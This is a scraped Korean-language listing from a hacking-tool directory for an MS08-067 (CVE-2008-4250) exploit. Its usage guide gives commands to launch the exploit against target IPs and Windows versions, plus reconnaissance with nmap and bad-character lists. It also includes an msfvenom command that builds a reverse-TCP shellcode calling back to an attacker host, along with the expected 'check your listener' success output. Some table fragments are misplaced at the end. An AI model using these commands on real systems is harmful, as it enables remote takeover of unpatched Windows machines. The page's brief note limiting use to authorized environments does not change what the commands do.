Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Exploit_MS08-067 — MS08-067 | CVE-2008-4250 | Kitploit
도구/GitHubGitHub/notrustedx/exploit_ms08-067
Payload GenerationVulnerability AnalysisExploitationShellcodePenetration TestingRemote Access Tool
GitHubnotrustedx/exploit_ms08-067

Exploit_MS08-067

MS08-067 | CVE-2008-4250

저장소 보기
121년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

종합 사용 가이드: # 향상된 MS08-067 Exploit

📌 기본 사용법

root@kitploit:~
python3 Exploit_MS08-067.py <IP_VÍCTIMA> <VERSIÓN_OS> [OPCIONES]

🎯 실전 예제

1. Windows XP SP0/SP1 (기본 포트 445)

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.100 1

2. Windows 2003 SP1 영어 (포트 139)

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.150 4 -p 139

3. 사용자 지정 Shellcode 사용

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.200 6 -s /ruta/mishellcode.bin

🔍 필수 매개변수

매개변수설명허용 값
IP_VÍCTIMA대상 IP모든 IPv4
VERSIÓN_OS취약한 OS 버전1-7 (표 참조)

📋 지원 OS 버전 표

값운영체제아키텍처
1Windows XP SP0/SP1 범용x86
2Windows 2000 범용x86
.........

⚙️ 추가 옵션

옵션설명기본값
-p/--portSMB 포트 (445/139)445
-t/--timeout

🛠️ msfvenom으로 Shellcode 생성

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.201 LPORT=4484 \
EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode \
-a x86 --platform windows

🔎 대상 식별

root@kitploit:~
nmap -p 139,445 --script smb-os-discovery <IP_VÍCTIMA>

🚨 일반적인 문제 해결

오류: STATUS_OBJECT_NAME_NOT_FOUND

  1. Browser 서비스가 활성화되어 있는지 확인하세요:

    root@kitploit:~
    nmap -p 445 --script smb-enum-shares <IP>
    
  2. 다른 파이프를 사용해 보세요 (스크립트 수정):

    root@kitploit:~
    # Cambiar \\pipe\\browser por \\pipe\\srvsvc
    

Shellcode가 실행되지 않는 경우

  • 금지 문자 확인: \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
  • 검증을 위해 다음 명령어를 사용하세요:
    root@kitploit:~
     msfvenom -p windows/exec CMD="calc.exe" -f raw | xxd | grep -E "00|0a|0d|5c|5f|2f|2e|40"
    

💡 윤리적 권장사항

✅ 승인된 환경에서만 사용할 것
❌ 허가 없이 프로덕션 시스템에는 절대 사용하지 말 것

📊 기대되는 성공 출력

root@kitploit:~
[*] Targeting 192.168.1.100 | OS: 1 | Port: 445
[+] Connected to 192.168.1.100 on port 445
[*] Sending exploit...
[+] Exploit finished - Check your listener!

⚠️ 참고: 이 익스플로잇은 MS08-067 보안 공지로 패치된 시스템에서는 작동하지 않습니다.

도구 다운로드
타임아웃(초)
5
-s/--shellcode사용자 지정 shellcode 경로None